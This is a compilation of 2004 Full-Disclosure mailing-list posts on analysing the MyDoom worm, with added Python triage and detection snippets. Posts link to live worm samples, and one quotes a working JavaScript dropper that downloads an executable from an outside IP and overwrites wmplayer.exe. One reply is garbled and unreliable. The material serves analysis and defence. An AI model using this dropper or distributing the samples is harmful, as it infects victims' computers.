Re: [Full-Disclosure] MyDoom download info
I think Daniel E. Spisak is quite right. Why would anyone post a virus/backdoor creation of his own? Also, if he wanted to, he would have distributed it in executable form, not the zipped one, right?

----- Original Message -----
From: "first last" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Saturday, January 31, 2004 5:58 AM
Subject: RE: [Full-Disclosure] MyDoom download info

> > > to successfully unpack the program. All they really needed to
> > > do was dump it from memory while it was running and they could've
> > > analyzed it immediately with any disassembler.
> >
> > Forgive me, I am no assembly hacker nor much of a programmer,
> > but would it be possible for a program to 'react' in some way
> > were one to try to dump it from memory?
>
> The program would have to use a device driver to protect itself from
> being dumped from memory to disk. But there are ways around that as well.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MyDoom download info.
Hello,

> http://www.nonmundane.org/~dspisak/danger/MyDoomB.exe

Ran it under VMware and confirmed. Aladdin StuffIt format self-extracting archive, contains the MyDoom.B worm executable (29,184 bytes) inside.

However, the AV industry standard is always to send virus samples in passworded ZIP archive format and nothing else. Never trust executables!

BTW, apparently there is a yet undiscovered bug in MyDoom.B code that prevents it from spreading effectively. Much of the code is encrypted, so dissecting proceeds slowly.

Regards,
Tamas Feher.
RE: [Full-Disclosure] MyDoom download info.
> BTW, apparently there is a yet undiscovered bug in MyDoom.B code that
> prevents it from spreading effectively. Much of the code is encrypted, so
> dissecting proceeds slowly.

It's still UPX packed, but it won't unpack with "UPX -d" because the author used a simple UPX scrambler. Either undo what he did or unpack it manually and you'll see all the code. The easiest way for anyone inexperienced with this is just to dump the memory to a file when the virus is running.

But you don't think the anti-virus companies already know everything about this virus? It's been a few days now and they should've found out everything they needed to know the very same day they got their first copy of MyDoom.B.
Re: [Full-Disclosure] MyDoom download info.
> > It's still UPX packed, but it won't unpack with "UPX -d" because the author
> > used a simple UPX scrambler. Either undo what he did or unpack it manually
> > and you'll see all the code.
>
> It actually un-UPX-ed just fine for me. What version have you been trying?

MyDoom.B as posted by someone else on this list. UPX -d doesn't work so you have to do it manually, which shouldn't be a problem.

> It disassembled nicely after that. The only other obfuscation (apart from
> quite a bit of wild jmp'ing around) is the rot13'ed strings, which isn't,
> erm, too challenging. Anything else?

Anyone with basic assembler knowledge could understand MyDoom and any other virus.
Re: [Full-Disclosure] MyDoom download info.
> It's still UPX packed, but it won't unpack with "UPX -d" because the author
> used a simple UPX scrambler. Either undo what he did or unpack it manually
> and you'll see all the code.

It actually un-UPX-ed just fine for me. What version have you been trying?

It disassembled nicely after that. The only other obfuscation (apart from quite a bit of wild jmp'ing around) is the rot13'ed strings, which isn't, erm, too challenging. Anything else? I've only looked quickly at it during a train ride.
Re: [Full-Disclosure] MyDoom download info.
> > It actually un-UPX-ed just fine for me. What version have you been trying?
>
> MyDoom.B as posted by someone else on this list. UPX -d doesn't work so you
> have to do it manually which shouldn't be a problem.

Oh, that clarifies it - I've just been looking at a copy of .A as it came to me en masse. Of course de-UPX'ing manually is not a problem.

> Anyone with basic assembler knowledge could understand MyDoom and any other
> virus.

Well, I'd be a tad bit careful with the 'any' bit, but the recent stuff or your everyday malware is really not at all hard to understand, which is why a large part of the discussions here sort of amazed me. What I want to say: My point exactly.

Cheers,
J.
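Added example, not code from any poster in this thread: a small Python scanner that pulls printable runs out of a binary blob and reports those that only become meaningful after rot13, turning the "rot13'ed strings" remark above into a repeatable triage check. The sample blob, the keyword list and the scoring rule are constructed assumptions.

```python
"""Find printable runs in a binary that only make sense after rot13.

Added for this thread; not code from any poster.  SAMPLE_BLOB, KEYWORDS and
the scoring rule are constructed assumptions.
"""
import codecs
import re

def rot13_bytes(data: bytes) -> bytes:
    """rot13 over ASCII letters only; digits, punctuation and non-ASCII pass through."""
    out = bytearray()
    for b in data:
        if 0x41 <= b <= 0x5A:
            out.append((b - 0x41 + 13) % 26 + 0x41)
        elif 0x61 <= b <= 0x7A:
            out.append((b - 0x61 + 13) % 26 + 0x61)
        else:
            out.append(b)
    return bytes(out)

# Constructed sample: junk bytes, one rot13'ed copy of the tag string quoted
# in the thread, a plain import name, and one rot13'ed SMTP fragment.
SAMPLE_BLOB = (
    b"\x00\x01MZ\x90\x00"
    + codecs.encode("sync-1.01; andy; I'm just doing my job, nothing personal, sorry", "rot13").encode()
    + b"\xff\xfe\x00kernel32.dll\x00"
    + codecs.encode("mail from: <%s>", "rot13").encode()
    + b"\x00\x00\x7f"
)

# Assumed list of tokens an analyst expects in cleartext; extend per sample.
KEYWORDS = ("mail", "from", "rcpt", "http", "personal", "job", "sorry", ".exe", ".dll")

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")

def score(text: str) -> int:
    """Count of expected keywords present, case-insensitive."""
    low = text.lower()
    return sum(1 for k in KEYWORDS if k in low)

def find_obfuscated_strings(blob: bytes):
    """Return (offset, raw, decoded) for runs where rot13 reveals more
    keywords than the raw text did.  Plain strings gain nothing and are skipped."""
    hits = []
    for m in PRINTABLE_RUN.finditer(blob):
        raw = m.group().decode("ascii")
        decoded = rot13_bytes(m.group()).decode("ascii")
        if score(decoded) > score(raw):
            hits.append((m.start(), raw, decoded))
    return hits

if __name__ == "__main__":
    for off, raw, dec in find_obfuscated_strings(SAMPLE_BLOB):
        print(f"{off:#06x}  {raw}\n        -> {dec}")
```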
[Full-Disclosure] REST and Virii?
Is it possible that we never analyze the whole picture, and virii are much more coordinated?

REST stands for REpresentational State Transfer, and is an architectural style for large-scale software design. REST suggests that what the Web got right is having a small, globally defined set of remote methods (HttpMethods: GET, POST, PUT, DELETE, etc) applied to any thing (specifically, any resource), because such a system allows a maximum number of otherwise uncoordinated actors to interoperate.

Take a closer look at: http://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm

-- Jim
[Full-Disclosure] mydoom.exe decyphering?
Sophos says: (sync-1.01; andy; I'm just doing my job, nothing personal, sorry)

OK, this can readily be deduced somewhat from the mydoom.exe but not entirely. Ironically Aladdin Systems can find itself back in the worm's 'strings' output... a part of it is compressed with StuffIt. [Download MyDoomB, cut out the StuffIt part, unstuff it and cut out the (3rd/last) data part (use tail or so). Then hexdump -C that one again.]

Here's the part with the text (use a fixed font in your mail client):

HEX      ff   87   22   92   00   0a   0a   28   73   79   6e   63   2d   31   2e   fd
ASCII     *    *   32    *    0   10   10   40  115  121  110   99   45   49   46    *
SYMBOL    *    *    "    *    *    *    *    (    s    y    n    c    -    1    .    *

HEX      ff   6f   ff   30   31   3b   20   61   6e   64   79   05   49   27   6d   20
ASCII     *  111    *   48   49   59   32   97  110  100  121    5   73   39  109   32
SYMBOL    *    o    *    0    1    ;         a    n    d    y    *    I    '    m

HEX      6a   75   73   74   20   64   6f   69   6e   67   20   6d   79   6b   ff   ef
ASCII   106  117  115  116   32  100  111  105  110  103   32  109  121  107    *    *
SYMBOL    j    u    s    t         d    o    i    n    g         m    y    k    *    *

HEX      bf   0d   6f   62   2c   20   6e   6f   74   68   0f   70   65   72   73   6f
ASCII     *   13  111   98   44   32  110  111  116  104   15  112  101  114  115  111
SYMBOL    *    *    o    b    ,         n    o    t    h    *    p    e    r    s    o

HEX      6e   61   6c   11   06   a6   fb   ae   7d   72   72   79   29   42   47   40
ASCII   110   97  108   17    6    *    *    *  125  114  114  121   41   66   71   64
SYMBOL    n    a    l    *    *    *    *    *    }    r    r    y    )    B    G    @

So: (sync-1...o.01; andy.I'm just doing mykob, noth.personal.}rry)

A few observations:
- 'noth*' seems to get its 'ing ' part from the token 'doing '
- likewise ' just' must be the inspiration for ' job', replacing the ' j' with 'k', where * are non-ASCII. Note that ' just' fits into '' and j=k-1
- '*}rry' should translate to ' sorry' or (Sophos) ', sorry'
- is it sync-1.01 or perhaps sync-1.1.p01 or so? Does anyone have any idea what this sync is anyway?
- if BG@ at the end could in some way end up being 'BEGIN' we have a uuencoded remainder which would have to be 'decrypted' first.
- how did Sophos fill in the blanks, or did they?

One would think the entire data chunk would be encrypted or encoded or whatever you want to call it in the same manner (something like uuenc/decode can be used to have binary data be changed and obfuscated as text and restored to binary through a 1 on 1 (de)obfuscation, right?).

Any thoughts? Is this a known algorithm that I'm not aware of for unicode compressing or something alike? How do other people investigate a binary? (I look at hexdumps, strings, output of 'file', magic numbers/strings...)

Let me dare say something I'm going to regret (heck, this list is full of flamethrowers anyway ;-) To be honest, I have an unpleasant feeling that this whole thing might be staged. It's so suggestive. But I lack the skill to look further and don't passionately care enough either. Yet, this is one interesting thing with the whole MS and SCO background.

Please note, I use FreeBSD exclusively, not Windows, but was bored and got interested, and I'm wondering if anyone has done any research or experimenting on this. I've looked at them on my FreeBSD desktop box. I'm not familiar with Windows code other than looking at some worm and noticing that it has smtp code or so. The things with archives within executables holding executables and even with a Mac archiving package being used, uhhmm, I'll pass on that and just assume that that's all normal and doable out there over the fence :)

Hope you don't blame me for trying to have some interesting discussion. No matter what your skill level, it sure beats the ever present pissing contests.

Regards,
--Dan (normally lurker with habitual attraction to DEL key)
Re: [Full-Disclosure] MyDoom download info
I know Dan Spisak personally, and can vouch for his honesty and integrity.

On Jan 30, 2004, at 4:38 PM, Scott Taylor wrote:

> Am I the only one that found it to be a little bit shady that these were made
> available as executables? Is the "B" version posted somewhere as just a plain
> zip? I don't seem to have already received my free copy in the mail yet.
>
> On Fri, 2004-01-30 at 12:17, Daniel Spisak wrote:
> > http://www.nonmundane.org/~dspisak/danger/README-FIRST.TXT
> > http://www.nonmundane.org/~dspisak/danger/MyDoomA.exe
> > http://www.nonmundane.org/~dspisak/danger/MyDoomB.exe
>
> --
> Scott Taylor - <[EMAIL PROTECTED]>
>
> BOFH Excuse #216: What office are you in? Oh, that one. Did you know that
> your building was built over the university's first nuclear research site?
> And wow, aren't you the lucky one, your office is right over where the core
> is buried!

-
Roland Dobbins <[EMAIL PROTECTED]> // 408.527.6376 voice
Re: [Full-Disclosure] Script Kiddies [OT]
On Saturday, 31 January 2004 00:24, Remko Lodder wrote:
> "all i can say is they have to start somewhere"
>
> --> That is why my friends and i started Mostly-Harmless,
> we educate those persons by telling them what is good and what
> is wrong, so we can convince them script kiddie is not good
> having knowledge is good, (if u use it properly),
> so we tend to keep them on the right track, we also offer them
> hacking things, on our _own_ machines so they can not do any harm.
>
> Released exploits are indeed one of the reasons why some kids think it's
> easy
> but the most knowledged of us should know that education is our prime
> target.

OMG, are you a hacker school or smth? THAT's kiddie production...!

-q

> Cheers
>
> --
>
> Kind regards,
>
> Remko Lodder
> Elvandar.org/DSINet.org
> www.mostly-harmless.nl Dutch community for helping newcomers on the
> hackerscene
[Full-Disclosure] Anyone looking to share arcane/unique/commercial OS mediums/sources
mail me! :)
Re[2]: [Full-Disclosure] MyDoom download info.
Hello last,

On 31 January 2004, 13:07:27, you wrote:

> > > It's still UPX packed, but it won't unpack with "UPX -d" because the
> > > author used a simple UPX scrambler. Either undo what he did or unpack it
> > > manually

This below VMware run and legalized this also we can at that time we be aware of because well, already. So that the worm is one selfextract archiv file. Infect only so for the first time when if form himself executing unfolds. This coming-out really infects dared infection to be little, what the, MyDoom b contains.letter worm executing (29,184 byte) inside. The AV we can industry stock, to send always virus.zip form. One yet undiscovered bug in the MyDoom b over there may be, how.letter code, but I do not calculate, so that encrypted would be able spreading. Encrypted you process if intensively worm that way you anatomize, MydoomB division several enkrypted also is between internally codes code. I deem, so that this within is not classified other, as: biddings. This I mean this so, how core worm is our task, and execution's time she. Since the author does not undo utilize UPX scramblin, the UPX D. Either you want what unpacked you did you undo simpler, if this hand-held to see, may not be to know to see all the code. True runs, how this the lightest road towards anybody inexpert this him only dump the memory one file when the virus. I am aware of to deem, the anti-virus companies could this what already every virus? Time found between two virus little, but during this little time prospectors plenty of information. More prolonged assaying confirmed after this him. Must deem she virus, infection, while the UPX packed malware "dared "UPX D"will not unpack this. True MyDoom b gave up letter as by this somebody other agendum. UPX D does not work so which must do one problem must not be she hand-held. This disassemble beautifully and then natural, how to be challenge, and non other.

Anybody would mean collect can not BASIC lingua knowledge, MyDoom and any other virus his gear, their codes. The encrypted are codes the fascinating: may not be to be aware of, so that within is hide. Virus's writing how bidding yet decoded solves and somebody this, shock due will be aware of that what awaiting virus.

--
Regards,
Geysap
mailto:[EMAIL PROTECTED]
www.gyik.com "VIRUS CORE TEAM"
Fiat justitia, pereat mundus!
we protect your digital worlds...
Re: [Full-Disc]: [Full-Disclosure] mydoom.exe decyphering?
Hi,

> OK, this can readily be deduced somewhat from the mydoom.exe but not
> entirely. Ironically aladdin systems can find itself back in the worm's
> 'strings' output... a part of it is compressed with stuffit.

Are you looking at the files from the URLs posted yesterday? Those were packed with StuffIt before being uploaded. The StuffIt part is not in the version that's ITW.

> So: (sync-1...o.01; andy.I'm just doing mykob, noth.personal.}rry)
> - how did sophos fill in the blanks, or did they

As discussed on the list, the files are packed with a runtime packer, so they have to be unpacked/dumped in order to see the unpacked data.

Best regards,
Anders
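Added illustration, not from the list: a toy LZ77-style compressor showing one mechanism consistent with both Dan's hexdump observations and Anders' runtime-packer reply. An LZ-family compressor keeps the first occurrence of a substring as literal bytes and replaces later repeats with back-references, so 'doing ' survives as text while the 'ing ' of 'nothing ' does not; the window size, minimum match and token layout are assumptions, and this is not UPX's actual NRV/UCL format.

```python
"""Toy LZ77 compressor: why packed data shows only fragments of its strings.

Added for this thread; not UPX's real NRV/UCL format.  Window size, minimum
match length and the token layout are assumptions chosen for readability.
"""

WINDOW = 255      # assumed look-back window, in bytes
MIN_MATCH = 3     # assumed: repeats shorter than this stay literal

# The cleartext Sophos published for the worm's tag string (from the thread).
SAMPLE = b"I'm just doing my job, nothing personal, sorry"

def lz77_compress(data: bytes):
    """Return tokens: ('lit', byte) or ('ref', distance, length).

    At each position the longest earlier repeat inside WINDOW is chosen;
    overlapping matches (distance < length) are allowed, as in real LZ77.
    """
    tokens = []
    i = 0
    while i < len(data):
        best_len, best_dist = 0, 0
        for j in range(max(0, i - WINDOW), i):
            n = 0
            while i + n < len(data) and data[j + n] == data[i + n] and n < 255:
                n += 1
            if n > best_len:
                best_len, best_dist = n, i - j
        if best_len >= MIN_MATCH:
            tokens.append(("ref", best_dist, best_len))
            i += best_len
        else:
            tokens.append(("lit", data[i]))
            i += 1
    return tokens

def lz77_decompress(tokens) -> bytes:
    """Inverse of lz77_compress; references copy byte by byte from the output."""
    out = bytearray()
    for tok in tokens:
        if tok[0] == "lit":
            out.append(tok[1])
        else:
            _, dist, length = tok
            for _ in range(length):
                out.append(out[-dist])
    return bytes(out)

def literal_view(tokens) -> str:
    """Roughly what `strings`/hexdump shows on the packed file: literal bytes
    as text, each back-reference collapsed to '*' (it is not text any more)."""
    parts = []
    for tok in tokens:
        if tok[0] == "lit":
            parts.append(chr(tok[1]) if 0x20 <= tok[1] < 0x7f else ".")
        else:
            parts.append("*")
    return "".join(parts)

if __name__ == "__main__":
    toks = lz77_compress(SAMPLE)
    assert lz77_decompress(toks) == SAMPLE
    print(literal_view(toks))   # -> I'm just doing my job, noth*personal, sorry
```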
[Full-Disclosure] Mydoom DDoS attack time table
I apologize if in my previous email I didn't make it clear; this is an important issue for system administrators worldwide, so I am emailing again in regard to this subject alone - a time table for the Mydoom DDoS attack.

In my post from the 30th of January with the subject "Refuting tall-tales and stories about the Mydoom.A and Mydoom.B worms" we released an analysis of the Mydoom worms' DoS mechanism, refuting rumors about it not existing (http://www.math.org.il/mydoom-facts.txt).

You can find a time table for when the DDoS attack will happen, as calculated by a C program Joe Stewart wrote, at: http://www.math.org.il/mydoom-a-timeline.txt

Mydoom.B has a time line too, but it can't be predicted as definitely because of an extra random check.

For more information about the DoS attack itself performed by the worm, how and when (including reverse engineering bits), you should check the above mentioned article.

Gadi Evron.
Re: [Full-Disclosure] MyDoom download info
On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray <[EMAIL PROTECTED]> said:

> I've often thought that none of the viruses so far encountered on the
> net are actually serious.
>
> What worries me are the viruses that have been around for a while
> and which have, so far, not been detected; these are the serious
> viruses (I'm assuming that they exist). Viruses that *don't* send
> vast amounts of email and hence get detected; viruses that *don't*
> run under a debugger, that *don't* give themselves away.

What worries me is we haven't seen *either* an actual damaging virus (imagine if the last 2 lines of Mydoom were "sleep(4hours); exec("format c:);") or a "sleeper" virus. At least we can console ourselves with the thought that a stealthy sleeper virus would almost by necessity have a very low burn rate, and thus take a long time to compromise a significant number of systems (if somebody has a way they'd like to share to spread quickly while remaining stealthy, feel free to comment ;)

I wish I knew which one to be more worried about the lack of.. ;)
Re: [Full-Disclosure] MyDoom download info
On Fri, 30 Jan 2004 17:07:12 PST, Daniel Spisak said:

> from, let alone the fact that I PGP sign all my email to this list?

Somehow, I'd feel better about this claim if I had found key 0xFC9ABEE3 on any of the 6 public key servers I tried. Bonus points for (a) having a signature other than your own on the key, (b) having signatures to connect it into the "strongly-connected set", and (c) knowing what the strongly-connected set is, and why it's useful to be in it.
Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story
Here's the other frame...

    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://211.19.46.20/5.exe ",0);
    x.Send();
    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);
    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";

Gadi Evron wrote:

> The past Trojan horses which spread this way took advantage of the fact web
> servers send an HTML 404 message if a file doesn't exist. The original sample
> - britney.jpg - was simply an html file itself, and using that fact, and IE
> loading it. It was combined with one of the latest exploits of the time (I
> don't think MS patched it yet), and downloaded the Trojan horses.
>
> This time around there is actually a picture on the web page, of a real
> honest to God girl. But in another frame.. the same story all over again.
>
> For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .
>
> Gadi Evron.
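Added detection example for a web proxy or IR triage script, not code from the post or from any product: it scores HTML/script content for the XMLHTTP + ADODB.Stream + SaveToFile combination seen in the frame above, so that ordinary XMLHTTP use stays below the threshold. The two samples, the indicator weights and the threshold are constructed assumptions, with a placeholder URL and path instead of the real ones.

```python
"""Score HTML/script content for the XMLHTTP + ADODB.Stream dropper pattern.

Added detection example; not code from the list or from any vendor.  The
indicator weights, the threshold and the two samples are assumptions.
"""
import re

# (name, regex, weight).  Weights are assumed: XMLHTTP alone is ordinary
# AJAX; ADODB.Stream writing responseBody to a .exe is the dropper.
INDICATORS = [
    ("xmlhttp",        re.compile(r"ActiveXObject\s*\(\s*['\"]Microsoft\.XMLHTTP['\"]", re.I), 1),
    ("adodb_stream",   re.compile(r"ActiveXObject\s*\(\s*['\"]ADODB\.Stream['\"]", re.I), 3),
    ("savetofile",     re.compile(r"\.SaveToFile\s*\(", re.I), 3),
    ("write_response", re.compile(r"\.Write\s*\(\s*\w+\.responseBody", re.I), 2),
    ("exe_on_disk",    re.compile(r"\.SaveToFile\s*\([^)]*\.exe", re.I), 2),
]
THRESHOLD = 5  # assumed: needs ADODB.Stream plus a file write, not XMLHTTP alone

def dropper_score(content: str):
    """Return (score, [indicator names]) for one HTML/JS document."""
    score, matched = 0, []
    for name, rx, weight in INDICATORS:
        if rx.search(content):
            score += weight
            matched.append(name)
    return score, matched

def is_ado_dropper(content: str) -> bool:
    return dropper_score(content)[0] >= THRESHOLD

# Constructed samples (not real pages).  SUSPECT mirrors the shape of the
# quoted frame with a placeholder URL and path.
BENIGN = """
<script>
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("GET", "/api/status", false);
x.send();
document.getElementById("s").innerText = x.responseText;
</script>
"""

SUSPECT = r"""
<script>
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://example.invalid/PLACEHOLDER.exe", 0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3; s.Type = 1; s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\PLACEHOLDER\\target.exe", 2);
</script>
"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, dropper_score(doc), "DROPPER" if is_ado_dropper(doc) else "ok")
```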
[Full-Disclosure] Re: Script Kiddies
The only difference between a 'script kiddie' and 90% of the 'security experts' out there is the tools they use. They're both clueless but at least the 'script kiddie' didn't spend $5000 on ISS Hackcamp to learn his techniques.
RE: [Full-Disclosure] Script Kiddies
Kinda wanted to take a minute to think about this. The big determiner between art and junk is passion. Regardless of what you do, if you're a good information security person, or a good hacker, you have a passion for the technology and the job. Doesn't really matter if you get paid for it or not, late evenings or not. If you have passion, then you have what it takes to excel in a field, any field, including information security.

There is a lot of passion for information security amongst some people, and for many it is just a job; don't take it so seriously, hey, see the latest Dilbert cartoon, and please read my blog.

I have only seen two attacks in 14 years of information security where I would like to meet the hacker. One from China, one from Russia. Very good; still don't know how the boxes survived the attacks, they were that good, that targeted, and that unique. They had passion, and should be the only ones allowed to have a CISSP or whatever certificate du jour is.

I think that is what Uncle is railing against, and if I am right, welcome to the side show. MCSEs and CISSP/CISA are all in the center ring right now. But like any circus, it too will fold up the tent, and the side show is what brings the "suckers born every minute" into the big top.

R/ Dan

> From: "Uncle Scrotora Balzac" <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Script Kiddies
> Date: Fri, 30 Jan 2004 08:23:38 -0800
>
> I love hearing security people talk about script kiddies. It's the funniest
> thing to see them walking around with their chests pushed out like
> peacocks, as they scoff the silly little kiddy.
Re: [Full-Disclosure] MyDoom download info
> Somehow, I'd feel better about this claim if I had found key 0xFC9ABEE3
> on any of the 6 public key servers I tried. Bonus points for (a) having
> a signature other than your own on the key, (b) having signatures to
> connect it into the "strongly-connected set", and (c) knowing what the
> strongly-connected set is, and why it's useful to be in it.

I am quite new to this particular "security" list, and this mail is not signed (which affects my credibility ;), however I find it disgusting how people respond to each other here - one claiming to be smarter than the other but also more insulting. I know that signatures and trust are a very delicate topic, but when you distrust anyone it's not necessary to show this in an insulting way - for your words imply suspicions which might or might not be justified.

I also got the URLs from Daniel Spisak by private email before it was posted here on the list. To calm down those who think it is necessary to have the files packed as password-protected ZIP, here we go:

Download at: http://assarbad.net/stuff/temp/MyDoom.zip
Password for the ZIP archive: "Full Disclosure" (without the quotes, of course).

!!! THIS IS STILL MEANT FOR ANALYSIS AND DISASSEMBLING, ONLY !!!

Best regards,
Oliver Schneider

PS: I'll take the file down on 2004-02-05!
[Full-Disclosure] Re: Mail undeliverable and filtered
--On Saturday, January 31, 2004 3:44 PM -0500 "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> wrote:

> Your mail to [EMAIL PROTECTED]; was filtered because of the potential spam or
> virus keyword [gambling] please contact the user by fax or telephone thank
> you. For this email filter system and other powerful software visit
> http://software.high-pow-er.com

Yeah! That's high powered software all right! I am highly impressed. Sheesh. (And this one will bounce too, no doubt.)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu
Re: [Full-Disclosure] MyDoom download info
--On Saturday, January 31, 2004 12:25 PM -0500 [EMAIL PROTECTED] wrote:

> On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray <[EMAIL PROTECTED]> said:
>
> What worries me is we haven't seen *either* an actual damaging virus
> (imagine if the last 2 lines of Mydoom were "sleep(4hours); exec("format
> c:);") or a "sleeper" virus.

This doesn't worry me much at all. Since virus writing has been taken over by the scammers, spammers, criminals and thieves, the last thing they want to do is destroy their bots. Their purpose isn't to infect and harm, it's to infect and use for their nefarious purposes - like the recent extortion attempts on online gambling sites (threatening to shut them down through DDoS during the Super Bowl, thereby depriving them of large amounts of revenue.)

The irony is the vxers got replaced by the professional criminals. Now the concern is not getting infected, it's making sure the computer is really and truly clean.

It would be nice if the malware *did* use exec(format C:). It would save networks a lot of time cleaning up and identify the infected machines quickly. :-)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu
Re: [Full-Disclosure] Re: Script Kiddies
So what's the difference between a script kiddie and a hacker in your opinion? Would it be the same difference between the "cookie cutter" security professionals and the actual professional? I'm curious.

[EMAIL PROTECTED] wrote:

> The only difference between a 'script kiddie' and 90% of the 'security
> experts' out there is the tools they use. They're both clueless but at
> least the 'script kiddie' didn't spend $5000 on ISS Hackcamp to learn his
> techniques.
[Full-Disclosure] MyDoom.b samples taken down
I have been asked by McAfee to take down my copy of MyDoom.B as they have insinuated that I am now responsible for this virus spreading. Sorry guys, I tried to help people out here but it would seem greater powers are at work here. Don't email me asking for copies as I won't be giving any more out. I suggest you direct future requests for this virus towards McAfee; perhaps in their infinite wisdom they will be willing to help other researchers.

Daniel E. Spisak
Security Engineer
OnlineSecurity
www.onlinesecurity.com
[EMAIL PROTECTED]
Cell: 562.331.1603
RE: [Full-Disclosure] MyDoom download info
> [mailto:[EMAIL PROTECTED] On Behalf Of Paul Schmehl
>
> --On Saturday, January 31, 2004 12:25 PM -0500 [EMAIL PROTECTED] wrote:
>
> > On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray
> > <[EMAIL PROTECTED]> said:
> >
> > What worries me is we haven't seen *either* an actual damaging virus
> > (imagine if the last 2 lines of Mydoom were "sleep(4hours);
> > exec("format c:);") or a "sleeper" virus.
>
> This doesn't worry me much at all. Since virus writing has
> been taken over by the scammers, spammers, criminals and thieves, the last

Paul, your quoting is a bit off there (makes it look as if I wrote that), but to address the points: as one person wrote, it's difficult to spread fast when you are trying to be stealthy; I would argue that if one is stealthy enough, one doesn't need to spread fast, since one is trying to evade detection rather than evading elimination.

If a virus could spread slowly but stealthily, it could be all over the planet and activated before any antivirus vendor became aware of its presence and came out with a fix; it wouldn't matter much if it took a year of quiet spreading.

Sometimes (and here I go sounding paranoid again) it seems that the viruses and worms we see are nothing but a smokescreen; they are SO VERY obvious. So-called 'script kiddies' and the old school vxers wanted a quick hit of adrenalin. Organised crime syndicates are a lot more patient.
[Full-Disclosure] another Trojan with the ADO hole? + a twist in the story
The past Trojan horses which spread this way took advantage of the fact web servers send an HTML 404 message if a file doesn't exist. The original sample - britney.jpg - was simply an html file itself, and using that fact, and IE loading it. It was combined with one of the latest exploits of the time (I don't think MS patched it yet), and downloaded the Trojan horses.

This time around there is actually a picture on the web page, of a real honest to God girl. But in another frame.. the same story all over again.

For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .

Gadi Evron.
[Full-Disclosure] [FLSA-2004:1222] Updated tcpdump resolves security vulnerabilities
---
Fedora Legacy Update Advisory

Synopsis: Updated tcpdump resolves security vulnerability
Advisory ID: FLSA:1222
Issue date: 2004-01-31
Product: Red Hat Linux
Keywords: Security
Cross references: https://bugzilla.fedora.us/show_bug.cgi?id=1222
CVE Names: CAN-2003-0989, CAN-2004-0055, CAN-2004-0057
---

1. Topic:

Updated tcpdump packages are now available that fix multiple security vulnerabilities which may allow remote attackers to exploit these issues by sending carefully-crafted packets to a victim. If the victim uses tcpdump, these packets could result in a denial of service, or possibly execute arbitrary code as the 'pcap' user.

2. Relevant releases/architectures:

Red Hat Linux 7.2 - i386
Red Hat Linux 7.3 - i386
Red Hat Linux 8.0 - i386

3. Problem description:

Tcpdump is a command-line tool for monitoring network traffic. Tcpdump can capture and display the packet headers on a particular network interface or on all interfaces. Tcpdump can display all of the packet headers, or just the ones that match particular criteria.

George Bakos discovered flaws in the ISAKMP decoding routines of tcpdump versions prior to 3.8.1. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2003-0989 to this issue.

Jonathan Heusser discovered an additional flaw in the ISAKMP decoding routines for tcpdump 3.8.1 and earlier. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-0057 to this issue.

Jonathan Heusser discovered a flaw in the print_attr_string function in the RADIUS decoding routines for tcpdump 3.8.1 and earlier. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-0055 to this issue.

Users of tcpdump should update to these update packages, which contain a backported security patch that corrects this issue.

Fedora Legacy would like to thank George Bakos and Jonathan Heusser for discovering and disclosing these issues, as well as Christian Pearce for providing a backported fix for Red Hat Linux 7.2, 7.3, and 8.0.

4. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs.

Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/download for directions on how to configure yum and apt-get.

5. Bug IDs fixed:

http://bugzilla.fedora.us - 1222 - tcpdump security fix in rh7x, rh80

6. RPMs required:

Red Hat Linux 7.2:

SRPMS:
http://download.fedoralegacy.org/redhat/7.2/updates/SRPMS/tcpdump-3.6.3-17.7.2.4.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.2/updates/i386/tcpdump-3.6.3-17.7.2.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.2/updates/i386/libpcap-0.6.2-17.7.2.4.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/7.2/updates/i386/arpwatch-2.1a11-17.7.2.4.legacy.i386.rpm

Red Hat Linux 7.3:

SRPMS:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/tcpdump-3.6.3-17.7.3.4.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/tcpdump-3.6.3-17.7.3.4.legacy.i386.rpm
